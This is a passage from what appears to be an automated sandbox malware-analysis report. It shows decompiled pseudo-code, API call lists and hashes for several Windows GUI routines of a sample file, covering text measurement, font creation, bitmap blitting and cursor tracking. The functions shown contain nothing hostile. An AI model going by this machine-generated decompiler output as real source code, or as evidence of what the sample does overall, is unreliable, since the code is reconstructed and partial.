								if(GetTextExtentPointA( *(_t211 + 8), _t183, 2,  &_v52) == 0) {
									L21:
									_t166 = _v124.tmAveCharWidth;
									goto L22;
								} else {
									asm("cdq");
									_t166 = _v52.cx - _t203 >> 1;
									L22:
									 *_t215 = _t166;
									L23:
									 *_t215 =  *_t215 - _v124.tmOverhang;
									_t196 =  *_t215;
									_t203 = _v20 - _v180.tmOverhang;
									_a12 =  &(_a12[_t196]);
									_v20 = _t203;
									if(_t215 != _a40) {
										asm("cdq");
										_t165 = _t196 - _t203 - _t203 >> 1;
										 *((intOrPtr*)(_t215 - 4)) =  *((intOrPtr*)(_t215 - 4)) + _t165;
										 *_t215 = _t196 - _t165;
									}
									_a36 = _a36 + 1;
									 *_a36 =  *_t183;
									if(E00434A02( *_t183) != 0 && _v8 <  *_a16) {
										_a36 = _a36 + 1;
										 *_a36 = _t183[1];
										_t161 =  *_t215;
										_a12 =  &(_a12[_t161]);
										_t215 =  &(_t215[1]);
										_v12 = _v12 + 1;
										_v8 = _v8 + 1;
										 *_t215 = _t161;
									}
									_t215 =  &(_t215[1]);
									goto L35;
								}
							}
						}
						L35:
						_t147 = E004348EB(_t203, _t211, _t183);
						_v12 = _v12 + 1;
						_v8 = _v8 + 1;
						_t183 = _t147;
					} while (_v12 <  *_a16);
					_t187 = _a8;
					_t128 = _a12;
					goto L37;
				}
			}










































                  0x0042d2c2
                  0x0042d2c8
                  0x0042d2d4
                  0x0042d2e3
                  0x0042d2ec
                  0x0042d2f2
                  0x0042d2f5
                  0x0042d2f8
                  0x0042d2fb
                  0x0042d314
                  0x0042d2fd
                  0x0042d304
                  0x0042d30d
                  0x0042d310
                  0x0042d310
                  0x0042d317
                  0x0042d31a
                  0x0042d31c
                  0x0042d320
                  0x0042d328
                  0x0042d32b
                  0x0042d32e
                  0x0042d331
                  0x0042d334
                  0x0042d33a
                  0x0042d354
                  0x0042d35a
                  0x0042d360
                  0x0042d363
                  0x0042d33c
                  0x0042d341
                  0x0042d341
                  0x0042d33a
                  0x0042d366
                  0x0042d369
                  0x0042d370
                  0x0042d50e
                  0x0042d510
                  0x0042d516
                  0x0042d518
                  0x0042d51b
                  0x0042d51e
                  0x0042d523
                  0x0042d52d
                  0x0042d53e
                  0x0042d543
                  0x0042d543
                  0x0042d545
                  0x0042d549
                  0x0042d555
                  0x0042d555
                  0x0042d565
                  0x0042d56c
                  0x0042d56c
                  0x0042d532
                  0x0042d535
                  0x0042d537
                  0x0042d537
                  0x00000000
                  0x0042d537
                  0x0042d525
                  0x00000000
                  0x0042d376
                  0x0042d376
                  0x0042d37d
                  0x0042d37d
                  0x0042d384
                  0x0042d387
                  0x0042d38c
                  0x0042d4a6
                  0x0042d4b2
                  0x0042d4b9
                  0x0042d4c8
                  0x0042d4c8
                  0x0042d4cf
                  0x0042d4d5
                  0x0042d4dc
                  0x0042d4d7
                  0x0042d4d7
                  0x0042d4d7
                  0x0042d4df
                  0x0042d4e2
                  0x0042d4e8
                  0x0042d39f
                  0x0042d3ab
                  0x0042d408
                  0x0042d41f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042d3b7
                  0x0042d3c9
                  0x0042d3d5
                  0x0042d3cb
                  0x0042d3ce
                  0x0042d3d1
                  0x0042d3d1
                  0x0042d3db
                  0x0042d3f0
                  0x0042d421
                  0x0042d421
                  0x00000000
                  0x0042d3f2
                  0x0042d3f5
                  0x0042d3f8
                  0x0042d424
                  0x0042d424
                  0x0042d426
                  0x0042d429
                  0x0042d42e
                  0x0042d430
                  0x0042d436
                  0x0042d439
                  0x0042d43f
                  0x0042d445
                  0x0042d448
                  0x0042d44c
                  0x0042d44f
                  0x0042d44f
                  0x0042d456
                  0x0042d459
                  0x0042d467
                  0x0042d479
                  0x0042d47c
                  0x0042d47e
                  0x0042d480
                  0x0042d483
                  0x0042d486
                  0x0042d489
                  0x0042d48c
                  0x0042d48c
                  0x0042d48e
                  0x00000000
                  0x0042d48e
                  0x0042d3f0
                  0x0042d3ab
                  0x0042d4eb
                  0x0042d4ec
                  0x0042d4f1
                  0x0042d4f4
                  0x0042d4fb
                  0x0042d500
                  0x0042d508
                  0x0042d50b
                  0x00000000
                  0x0042d50b

                  APIs
                  • GetTextMetricsA.GDI32(?,?), ref: 0042D2C8
                  • GetTextMetricsA.GDI32(?,?), ref: 0042D2D4
                  • GetTextExtentPoint32A.GDI32(?,00454DB8,00000001,?), ref: 0042D2E3
                  • GetTextAlign.GDI32(?), ref: 0042D2EC
                  • GetCurrentPositionEx.GDI32(?,?), ref: 0042D304
                  • GetTabbedTextExtentA.USER32(?,00454DB4,00000001,00000000,00000000), ref: 0042D354
                  • GetTextExtentPointA.GDI32(00000001,?,00000002,?), ref: 0042D3C1
                  • GetTextExtentPointA.GDI32(00000000,?,00000002,?), ref: 0042D3E8
                  • GetCharWidthA.GDI32(00000001,00000000,00000000,?), ref: 0042D408
                  • GetCharWidthA.GDI32(00000000,00000000,00000000,?), ref: 0042D417
                  • GetTextExtentPoint32A.GDI32(00000000,?,?,?), ref: 0042D4A6
                  • __mbsinc.LIBCMT ref: 0042D4EC
                  • MoveToEx.GDI32(?,?,?,00000000), ref: 0042D555
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Text$Extent$CharMetricsPointPoint32Width$AlignCurrentMovePositionTabbed__mbsinc
                  • String ID:
                  • API String ID: 2771247214-0
                  • Opcode ID: 3ff7e1a845ed8d10c28fc4d3c49dc106eccc5b0a7c26ecc63004be9a7f000bf3
                  • Instruction ID: 80ba98c3184a9379cf6ff72923f26b37a2a1162b8237e024fa54389e1ba7250f
                  • Opcode Fuzzy Hash: 3ff7e1a845ed8d10c28fc4d3c49dc106eccc5b0a7c26ecc63004be9a7f000bf3
                  • Instruction Fuzzy Hash: 19B16575A0022AEFCF10CFA8E984AEEBBB5FF09314F54416AE815A7250C778AD51CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042D0D6, Relevance: 19.6, APIs: 13, Instructions: 137COMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E0042D0D6(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				struct tagSIZE _v76;
				struct tagSIZE _v84;
				void* _v88;
				int _v92;
				int _v96;
				struct tagTEXTMETRICA _v152;
				void* __esi;
				signed int _t65;
				long _t73;
				void* _t82;
				signed int _t86;
				signed int _t87;
				void* _t112;
				int _t116;
				void* _t118;
				void* _t121;
				void** _t122;
				signed int _t124;
				signed int _t126;

				_t113 = __edi;
				_t112 = __edx;
				_t104 = __ebx;
				_t124 = _t126;
				_t65 =  *0x463404; // 0x38a11573
				_t66 = _t65 ^ _t124;
				_v8 = _t65 ^ _t124;
				_t120 = __ecx;
				if( *(__ecx + 8) != 0) {
					_t66 =  *(__ecx + 0x2c);
					if(_t66 != 0) {
						if( *((intOrPtr*)(__ecx + 4)) != 0) {
							_push(__ebx);
							_push(__edi);
							GetObjectA(_t66, 0x3c,  &_v68);
							GetTextFaceA( *(__ecx + 8), 0x20,  &(_v68.lfFaceName));
							GetTextMetricsA( *(__ecx + 8),  &_v152);
							_t73 = _v152.tmHeight;
							if(_t73 >= 0) {
								_v68.lfHeight = _v152.tmInternalLeading - _t73;
							} else {
								_v68.lfHeight = _t73;
							}
							_v68.lfWidth = _v152.tmAveCharWidth;
							_v68.lfWeight = _v152.tmWeight;
							_v68.lfItalic = _v152.tmItalic;
							_v68.lfUnderline = _v152.tmUnderlined;
							_v68.lfStrikeOut = _v152.tmStruckOut;
							_v68.lfCharSet = _v152.tmCharSet;
							_v68.lfPitchAndFamily = _v152.tmPitchAndFamily;
							_t82 = CreateFontIndirectA( &_v68);
							_v88 = _t82;
							SelectObject( *(_t120 + 4), _t82);
							GetTextMetricsA( *(_t120 + 4),  &_v152);
							_t86 = _v152.tmHeight;
							_t116 =  ~(_v68.lfHeight);
							if(_t86 >= 0) {
								_t87 = _t86 - _v152.tmInternalLeading;
							} else {
								_t87 =  ~_t86;
							}
							_v92 = _t87;
							GetWindowExtEx( *(_t120 + 4),  &_v76);
							GetViewportExtEx( *(_t120 + 4),  &_v84);
							if(_v76.cy < 0) {
								_v76.cy =  ~(_v76.cy);
							}
							if(_v84.cy < 0) {
								_v84.cy =  ~(_v84.cy);
							}
							_v96 = MulDiv(_t116, _v84.cy, _v76.cy);
							if(_v96 >= MulDiv(_v92, _v84.cy, _v76.cy)) {
								_t118 = _v88;
							} else {
								_v68.lfPitchAndFamily = (_v68.lfPitchAndFamily & 0 | (_v68.lfPitchAndFamily & 0x000000f0) != 0x00000050) - 0x00000001 & 0x00000050;
								_v68.lfFaceName = 0;
								_t118 = CreateFontIndirectA( &_v68);
								SelectObject( *(_t120 + 4), _t118);
								DeleteObject(_v88);
							}
							_t122 = _t120 + 0x28;
							_t66 = E0041FCF2(_t122);
							 *_t122 = _t118;
							_pop(_t113);
							_pop(_t104);
						}
					} else {
						_push(0xe);
						_t66 =  *((intOrPtr*)( *__ecx + 0x24))();
					}
				}
				_pop(_t121);
				return E00430650(_t66, _t104, _v8 ^ _t124, _t112, _t113, _t121);
			}
























                  0x0042d0d6
                  0x0042d0d6
                  0x0042d0d6
                  0x0042d0d9
                  0x0042d0e1
                  0x0042d0e6
                  0x0042d0e8
                  0x0042d0ec
                  0x0042d0f2
                  0x0042d0f8
                  0x0042d0fd
                  0x0042d10f
                  0x0042d115
                  0x0042d116
                  0x0042d11e
                  0x0042d12d
                  0x0042d143
                  0x0042d145
                  0x0042d14d
                  0x0042d15c
                  0x0042d14f
                  0x0042d14f
                  0x0042d14f
                  0x0042d168
                  0x0042d16e
                  0x0042d174
                  0x0042d17a
                  0x0042d180
                  0x0042d186
                  0x0042d18c
                  0x0042d193
                  0x0042d199
                  0x0042d19c
                  0x0042d1ac
                  0x0042d1b1
                  0x0042d1b7
                  0x0042d1bb
                  0x0042d1c1
                  0x0042d1bd
                  0x0042d1bd
                  0x0042d1bd
                  0x0042d1c7
                  0x0042d1d1
                  0x0042d1de
                  0x0042d1e8
                  0x0042d1ea
                  0x0042d1ea
                  0x0042d1f1
                  0x0042d1f3
                  0x0042d1f3
                  0x0042d208
                  0x0042d216
                  0x0042d24a
                  0x0042d218
                  0x0042d226
                  0x0042d22d
                  0x0042d233
                  0x0042d239
                  0x0042d242
                  0x0042d242
                  0x0042d24d
                  0x0042d251
                  0x0042d256
                  0x0042d258
                  0x0042d259
                  0x0042d259
                  0x0042d0ff
                  0x0042d101
                  0x0042d103
                  0x0042d103
                  0x0042d0fd
                  0x0042d25f
                  0x0042d266

                  APIs
                  • GetObjectA.GDI32(?,0000003C,?), ref: 0042D11E
                  • GetTextFaceA.GDI32(00000000,00000020,?), ref: 0042D12D
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D143
                  • CreateFontIndirectA.GDI32(?), ref: 0042D193
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D19C
                  • GetTextMetricsA.GDI32(00000000,?), ref: 0042D1AC
                  • GetWindowExtEx.GDI32(00000000,?), ref: 0042D1D1
                  • GetViewportExtEx.GDI32(00000000,?), ref: 0042D1DE
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D203
                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0042D211
                  • CreateFontIndirectA.GDI32(?), ref: 0042D231
                  • SelectObject.GDI32(00000000,00000000), ref: 0042D239
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ObjectText$CreateFontIndirectMetricsSelect$FaceViewportWindow
                  • String ID:
                  • API String ID: 4277312469-0
                  • Opcode ID: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction ID: 782ba5df95f801dfe7796d8664102e7f783a38d20a5401a22cb6488579e2bdbf
                  • Opcode Fuzzy Hash: 46c90baf14463cde0e743273ea8f5b1da7676210bc4cae94f4770b9c8b14f1b6
                  • Instruction Fuzzy Hash: 70513235A00268DFDF118FA5DD45AEEBBB9FF59300F10406AE859A6211D734AD46CF28
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00423285, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 194windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E00423285(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t115;
				void* _t121;
				intOrPtr _t162;
				void* _t170;
				void* _t171;

				_t171 = __eflags;
				_push(0x58);
				E00431A9B(E0044BFAF, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t170 - 0x3c)) = 0x45385c;
				 *(_t170 - 0x38) = 0;
				 *((intOrPtr*)(_t170 - 0x34)) = 0;
				 *((intOrPtr*)(_t170 - 0x30)) = 0;
				 *(_t170 - 4) = 0;
				 *((intOrPtr*)(_t170 - 0x4c)) = 0x45385c;
				 *(_t170 - 0x48) = 0;
				 *((intOrPtr*)(_t170 - 0x44)) = 0;
				 *((intOrPtr*)(_t170 - 0x40)) = 0;
				_t162 = 0x4502c8;
				 *((intOrPtr*)(_t170 - 0x18)) = 0;
				 *((intOrPtr*)(_t170 - 0x1c)) = 0x4502c8;
				 *(_t170 - 4) = 2;
				_push(GetSysColor(0x14));
				E00423242(0, _t170 - 0x2c, 0x4502c8, GetSysColor, _t171);
				 *(_t170 - 4) = 3;
				_push(GetSysColor(0x10));
				E00423242(0, _t170 - 0x24, 0x4502c8, GetSysColor, _t171);
				 *(_t170 - 4) = 4;
				if(E0040876B(_t170 - 0x3c, 0) != 0 && E0040876B(_t170 - 0x4c, 0) != 0) {
					_t168 =  *((intOrPtr*)(_t170 + 8));
					GetObjectA( *( *((intOrPtr*)(_t170 + 8)) + 4), 0x18, _t170 - 0x64);
					E004230B1( *((intOrPtr*)(_t170 + 0xc)));
					if(E004230ED( *((intOrPtr*)(_t170 + 0xc)),  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x54) & 0x0000ffff,  *(_t170 - 0x52) & 0x0000ffff, 0) != 0 && E004230ED(_t170 - 0x1c,  *(_t170 - 0x60),  *(_t170 - 0x5c), 1, 1, 0) != 0) {
						 *((intOrPtr*)(_t170 + 8)) = E00408791(_t170 - 0x3c, _t168);
						_t115 = E00408791(_t170 - 0x4c, _t170 - 0x1c);
						 *((intOrPtr*)(_t170 - 0x14)) = _t115;
						if( *((intOrPtr*)(_t170 + 8)) != 0 && _t115 != 0) {
							 *((intOrPtr*)(_t170 - 0x10)) = E004224D1(GetPixel( *(_t170 - 0x38), 0, 0), _t170 - 0x3c, _t116);
							E004224D1(BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0xcc0020), _t170 - 0x3c, 0xffffff);
							BitBlt( *(_t170 - 0x48), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x38), 0, 0, 0x1100a6);
							_t121 = E00408791(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc)));
							_t178 = _t121;
							if(_t121 != 0) {
								E004224D1(E00423FD4(_t170 - 0x3c, 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *((intOrPtr*)(_t170 + 0x10))), _t170 - 0x3c, 0xffffff);
								 *((intOrPtr*)(_t170 + 0xc)) = E00423194(_t170 - 0x3c, _t170 - 0x2c);
								BitBlt( *(_t170 - 0x38), 1, 1,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
								E00423194(_t170 - 0x3c, _t170 - 0x24);
								BitBlt( *(_t170 - 0x38), 0, 0,  *(_t170 - 0x60),  *(_t170 - 0x5c),  *(_t170 - 0x48), 0, 0, 0xe20746);
								E004224D1(E00423194(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 0xc))), _t170 - 0x3c,  *((intOrPtr*)(_t170 - 0x10)));
							}
							E00408791(_t170 - 0x4c,  *((intOrPtr*)(_t170 - 0x14)));
							E00408791(_t170 - 0x3c,  *((intOrPtr*)(_t170 + 8)));
							_t162 = 0x4502c8;
						}
					}
				}
				 *(_t170 - 4) = 3;
				 *((intOrPtr*)(_t170 - 0x24)) = 0x452f4c;
				E0040ADD4(0, _t170 - 0x24, _t162, 0x452f4c, _t178);
				 *(_t170 - 4) = 2;
				 *((intOrPtr*)(_t170 - 0x2c)) = 0x452f4c;
				E0040ADD4(0, _t170 - 0x2c, _t162, 0x452f4c, _t178);
				 *(_t170 - 4) = 1;
				 *((intOrPtr*)(_t170 - 0x1c)) = _t162;
				E0040ADD4(0, _t170 - 0x1c, _t162, 0x452f4c, _t178);
				 *(_t170 - 4) = 0;
				E00422E06(_t170 - 0x4c);
				 *(_t170 - 4) =  *(_t170 - 4) | 0xffffffff;
				return E00431B73(E00422E06(_t170 - 0x3c));
			}








                  0x00423285
                  0x00423285
                  0x0042328c
                  0x00423298
                  0x0042329b
                  0x0042329e
                  0x004232a1
                  0x004232a4
                  0x004232a7
                  0x004232aa
                  0x004232ad
                  0x004232b0
                  0x004232b3
                  0x004232b8
                  0x004232bb
                  0x004232c6
                  0x004232cc
                  0x004232d0
                  0x004232d7
                  0x004232dd
                  0x004232e1
                  0x004232ea
                  0x004232f5
                  0x0042330c
                  0x00423318
                  0x00423321
                  0x00423341
                  0x0042336b
                  0x00423375
                  0x0042337a
                  0x00423380
                  0x004233b2
                  0x004233cb
                  0x004233e5
                  0x004233ed
                  0x004233f2
                  0x004233f4
                  0x0042340d
                  0x00423429
                  0x00423439
                  0x00423442
                  0x00423458
                  0x0042346b
                  0x0042346b
                  0x00423476
                  0x00423481
                  0x00423486
                  0x00423486
                  0x00423380
                  0x00423341
                  0x00423493
                  0x00423497
                  0x0042349a
                  0x004234a2
                  0x004234a6
                  0x004234a9
                  0x004234b1
                  0x004234b5
                  0x004234b8
                  0x004234c0
                  0x004234c3
                  0x004234c8
                  0x004234d9

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0042328C
                  • GetSysColor.USER32(00000014), ref: 004232CA
                    • Part of subcall function 00423242: __EH_prolog3.LIBCMT ref: 00423249
                    • Part of subcall function 00423242: CreateSolidBrush.GDI32(?), ref: 00423264
                  • GetSysColor.USER32(00000010), ref: 004232DB
                    • Part of subcall function 0040876B: CreateCompatibleDC.GDI32(?), ref: 0040877E
                  • GetObjectA.GDI32(00000004,00000018,?), ref: 00423318
                    • Part of subcall function 004230ED: CreateBitmap.GDI32(?,?,?,?,?), ref: 00423104
                  • GetPixel.GDI32(?,00000000,00000000), ref: 00423393
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224EF
                    • Part of subcall function 004224D1: SetBkColor.GDI32(?,?), ref: 004224FC
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004233C0
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 004233E5
                    • Part of subcall function 00423FD4: SetBkColor.GDI32(00000000,?), ref: 00423FE5
                    • Part of subcall function 00423FD4: ExtTextOutA.GDI32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00424017
                    • Part of subcall function 00423194: SelectObject.GDI32(?,00000000), ref: 004231BA
                    • Part of subcall function 00423194: SelectObject.GDI32(?,?), ref: 004231D0
                  • BitBlt.GDI32(?,00000001,00000001,?,?,?,00000000,00000000,00E20746), ref: 00423439
                  • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00E20746), ref: 00423458
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$CreateObject$H_prolog3Select$BitmapBrushCompatiblePixelSolidText
                  • String ID: L/E$\8E
                  • API String ID: 3190328746-603014896
                  • Opcode ID: 3ff2db5e1597f59de4d40c46edeb17716054e59519dfac510e37256ba6260ae5
                  • Instruction ID: 1e965cb3cce3642539156f5de479b909e84430b2223586cd9c3720f517206d08
                  • Opcode Fuzzy Hash: 3ff2db5e1597f59de4d40c46edeb17716054e59519dfac510e37256ba6260ae5
                  • Instruction Fuzzy Hash: 057122B1D0021DBEDF05EFE1EC819EEBB79AF08308F50802AB915761A1DB395E15DB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00419B2A, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 185timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 96%
                  			E00419B2A(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				struct tagRECT _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t63;
				signed short _t69;
				signed int _t79;
				signed int _t80;
				void* _t87;
				void* _t91;
				intOrPtr _t93;
				long _t94;
				signed short _t98;
				signed int _t108;
				signed short _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;

				_t113 = __ecx;
				GetCursorPos( &_v20);
				GetWindowRect( *(_t113 + 0x20),  &_v44);
				_t53 =  *((intOrPtr*)(_t113 + 0x70));
				_t111 = 0;
				if(_t53 == 0x7923 || _t53 == 0x7922) {
					_t93 = _v20.y;
					if(_t93 >= _v44.top) {
						__eflags = _t93 - _v44.bottom;
						if(_t93 > _v44.bottom) {
							_t111 = 0x791d;
						}
					} else {
						_t111 = 0x7917;
					}
				}
				if(_t53 == 0x7923 || _t53 == 0x7921) {
					_t94 = _v20.x;
					if(_t94 >= _v44.left) {
						__eflags = _t94 - _v44.right;
						if(_t94 > _v44.right) {
							__eflags = _t111;
							if(_t111 != 0) {
								__eflags = _t53 - 0x7923;
								if(_t53 == 0x7923) {
									_t111 = _t111 + 1;
									__eflags = _t111;
								}
							} else {
								_t111 = 0x791b;
							}
						}
					} else {
						if(_t111 != 0) {
							__eflags = _t53 - 0x7923;
							if(_t53 == 0x7923) {
								_t111 = _t111 - 1;
							}
						} else {
							_t111 = 0x7919;
						}
					}
				}
				if( *((intOrPtr*)(_t113 + 0x6c)) == 0) {
					__eflags = _t111;
					if(__eflags != 0) {
						SetCursor(LoadCursorA( *(E0041F363(0x7923, _t111, _t113, __eflags) + 0xc), _t111 & 0x0000ffff));
						_t58 = _v20.x;
						__eflags = _t58 - _v44.right;
						if(_t58 <= _v44.right) {
							__eflags = _t58 - _v44.left;
							if(_t58 >= _v44.left) {
								_t26 =  &_v12;
								 *_t26 = _v12 & 0x00000000;
								__eflags =  *_t26;
								L30:
								_t59 = _v20.y;
								__eflags = _t59 - _v44.bottom;
								if(_t59 <= _v44.bottom) {
									__eflags = _t59 - _v44.top;
									if(_t59 >= _v44.top) {
										_t34 =  &_v8;
										 *_t34 = _v8 & 0x00000000;
										__eflags =  *_t34;
										L36:
										_t112 = E00410293(_t113);
										_t61 =  *((intOrPtr*)(_t113 + 0x70));
										__eflags = _t61 - 0x7923;
										if(_t61 == 0x7923) {
											L39:
											_t98 = 1;
											__eflags = 1;
											L40:
											__eflags = _t61 - 0x7923;
											if(_t61 == 0x7923) {
												L43:
												_t63 = 1;
												__eflags = 1;
												L44:
												 *((intOrPtr*)( *_t112 + 0x18c))( &_v28, _v12, _v8, _t63, _t98);
												E00412C34(_t113, 0);
												_t69 = E0041E9BB("`&E", E0040EE3C(0, _t113, GetParent( *(_t112 + 0x20))));
												_push(1);
												_push(_v24);
												_push(_v28);
												__eflags = _t69;
												if(_t69 != 0) {
													 *((intOrPtr*)( *_t69 + 0x184))(_t112);
												} else {
													 *((intOrPtr*)( *_t112 + 0x144))();
												}
												UpdateWindow( *(_t113 + 0x20));
												__eflags =  *((intOrPtr*)(_t113 + 0x64)) - 0x10;
												return E00412D05(_t113, 0x466348,  *((intOrPtr*)(_t113 + 0x64)) - 0x10,  *((intOrPtr*)(_t113 + 0x68)) - 0x10, 0, 0, 0x51);
											}
											__eflags = _t61 - 0x7921;
											if(_t61 == 0x7921) {
												goto L43;
											}
											_t63 = 0;
											goto L44;
										}
										__eflags = _t61 - 0x7922;
										if(_t61 == 0x7922) {
											goto L39;
										}
										_t98 = 0;
										goto L40;
									}
									_t79 = _t59 - _v44.top;
									__eflags = _t79;
									L34:
									_v8 = _t79;
									goto L36;
								}
								_t79 = _t59 - _v44.bottom;
								goto L34;
							}
							_t80 = _t58 - _v44.left;
							__eflags = _t80;
							L28:
							_v12 = _t80;
							goto L30;
						}
						_t80 = _t58 - _v44.right;
						goto L28;
					}
					return SetCursor( *(_t113 + 0x74));
				}
				KillTimer( *(_t113 + 0x20), 0xe000);
				ReleaseCapture();
				SetCursor(0);
				_t91 = E00410293(_t113);
				_t87 =  *((intOrPtr*)( *_t113 + 0x60))();
				_t108 =  *(_t91 + 0x58);
				if(_t108 != 0) {
					_t87 =  *((intOrPtr*)( *_t108 + 4))(1);
				}
				 *(_t91 + 0x58) =  *(_t91 + 0x58) & 0x00000000;
				return _t87;
			}






























                  0x00419b39
                  0x00419b3b
                  0x00419b48
                  0x00419b4e
                  0x00419b56
                  0x00419b5a
                  0x00419b63
                  0x00419b69
                  0x00419b72
                  0x00419b75
                  0x00419b77
                  0x00419b77
                  0x00419b6b
                  0x00419b6b
                  0x00419b6b
                  0x00419b69
                  0x00419b7e
                  0x00419b87
                  0x00419b8d
                  0x00419ba1
                  0x00419ba4
                  0x00419ba6
                  0x00419ba8
                  0x00419bb1
                  0x00419bb3
                  0x00419bb5
                  0x00419bb5
                  0x00419bb5
                  0x00419baa
                  0x00419baa
                  0x00419baa
                  0x00419ba8
                  0x00419b8f
                  0x00419b91
                  0x00419b9a
                  0x00419b9c
                  0x00419b9e
                  0x00419b9e
                  0x00419b93
                  0x00419b93
                  0x00419b93
                  0x00419b91
                  0x00419b8d
                  0x00419bba
                  0x00419bff
                  0x00419c01
                  0x00419c25
                  0x00419c2b
                  0x00419c2e
                  0x00419c31
                  0x00419c38
                  0x00419c3b
                  0x00419c45
                  0x00419c45
                  0x00419c45
                  0x00419c49
                  0x00419c49
                  0x00419c4c
                  0x00419c4f
                  0x00419c56
                  0x00419c59
                  0x00419c63
                  0x00419c63
                  0x00419c63
                  0x00419c67
                  0x00419c6e
                  0x00419c70
                  0x00419c73
                  0x00419c75
                  0x00419c82
                  0x00419c84
                  0x00419c84
                  0x00419c85
                  0x00419c85
                  0x00419c87
                  0x00419c94
                  0x00419c96
                  0x00419c96
                  0x00419c97
                  0x00419ca7
                  0x00419cb2
                  0x00419ccc
                  0x00419cd3
                  0x00419cd5
                  0x00419cd8
                  0x00419cdb
                  0x00419cdd
                  0x00419cf0
                  0x00419cdf
                  0x00419ce3
                  0x00419ce3
                  0x00419cf9
                  0x00419d0d
                  0x00000000
                  0x00419d18
                  0x00419c89
                  0x00419c8e
                  0x00000000
                  0x00000000
                  0x00419c90
                  0x00000000
                  0x00419c90
                  0x00419c77
                  0x00419c7c
                  0x00000000
                  0x00000000
                  0x00419c7e
                  0x00000000
                  0x00419c7e
                  0x00419c5b
                  0x00419c5b
                  0x00419c5e
                  0x00419c5e
                  0x00000000
                  0x00419c5e
                  0x00419c51
                  0x00000000
                  0x00419c51
                  0x00419c3d
                  0x00419c3d
                  0x00419c40
                  0x00419c40
                  0x00000000
                  0x00419c40
                  0x00419c33
                  0x00000000
                  0x00419c33
                  0x00000000
                  0x00419c06
                  0x00419bc4
                  0x00419bca
                  0x00419bd2
                  0x00419bdf
                  0x00419be5
                  0x00419be8
                  0x00419bed
                  0x00419bf3
                  0x00419bf3
                  0x00419bf6
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
